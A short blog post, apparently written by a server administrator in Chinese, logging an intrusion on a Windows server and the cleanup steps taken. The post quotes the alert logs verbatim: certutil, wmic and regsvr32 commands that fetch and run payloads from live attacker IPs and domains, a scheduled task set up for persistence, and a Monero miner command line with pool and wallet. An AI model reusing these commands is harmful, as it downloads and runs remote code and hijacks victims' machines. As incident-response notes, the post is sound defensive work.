一次应用入侵
服务器报警
命令行: cmd.exe /c "certutil.exe -urlcache -split -f http://146.196.83.217:29324/winTask.exe C:WindowsTempwinTask.exe"
命令行: C:\Windows\System32\Wbem\wmic.EXE os get /format:"http://sec.dashabi.in/javaw2/net/net.xsl"
进程路径: C:/Windows/System32/wbem/WMIC.exe
进程ID: 8544
父进程命令行: taskeng.exe {91BBC158-F18D-4E4A-8D69-117DF5612003} S-1-5-18:NT AUTHORITY\System:Service:
命令行: schtasks /create /tn SystemProcessDebug /tr "certutil.exe -urlcache -split -f http://118.190.211.34:82/image/png/winTask.exe C:\Window\Temp\winTask.exe & C:\Windows\Temp\winTask.exe" /sc daily
进程PID: 10736
进程文件名: schtasks.exe
c:/windows/temp/core/core.exe
命令行参数: C:\Windows\Temp\core\core.exe --coin monero -o xmr.f2pool.com:13531 -u 46YngqQEZQ6HYhqP7noesGdoecXZRM2jR16t7RKTbhW4TtqdKUQyggs3x7pADEWvpr5ySbesyQQwJfaHbewXurEWNdeWNtj.gtest -p x -k -B --donate-level=1 --cpu-max-threads-hint=70
类型: Task Scheduler(计划任务)
路径: \Microsoft\Windows\MUI\LMRemover
内容: regsvr32 /u /s /i:http://sec.dashabi.in/javaw2/instance.xsl scrobj.dll
事件说明: 检测模型发现您服务器上的某些自启动项可疑,可能是恶意软件或者黑客在入侵后进行的持久化痕迹。
这个没看明白 https://www.cnblogs.com/backlion/p/10489521.html
将ip 加入黑名单,将域名加到hosts中指向127.0.0.1
?将schtasks.exe 文件改为非admin可执行 需要trustedinstaller提供的权限
==>
新建管理员用户,登录,对该文件 属性--安全--所有者--编辑换成当前用户 然后再更改权限
?删除定时任务
chcp 437
schtasks /query /fo LIST /v |findstr http
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· AI与.NET技术实操系列:基于图像分类模型对图像进行分类
· go语言实现终端里的倒计时
· 如何编写易于单元测试的代码
· 10年+ .NET Coder 心语,封装的思维:从隐藏、稳定开始理解其本质意义
· .NET Core 中如何实现缓存的预热?
· 分享一个免费、快速、无限量使用的满血 DeepSeek R1 模型,支持深度思考和联网搜索!
· 基于 Docker 搭建 FRP 内网穿透开源项目(很简单哒)
· ollama系列01:轻松3步本地部署deepseek,普通电脑可用
· 25岁的心里话
· 按钮权限的设计及实现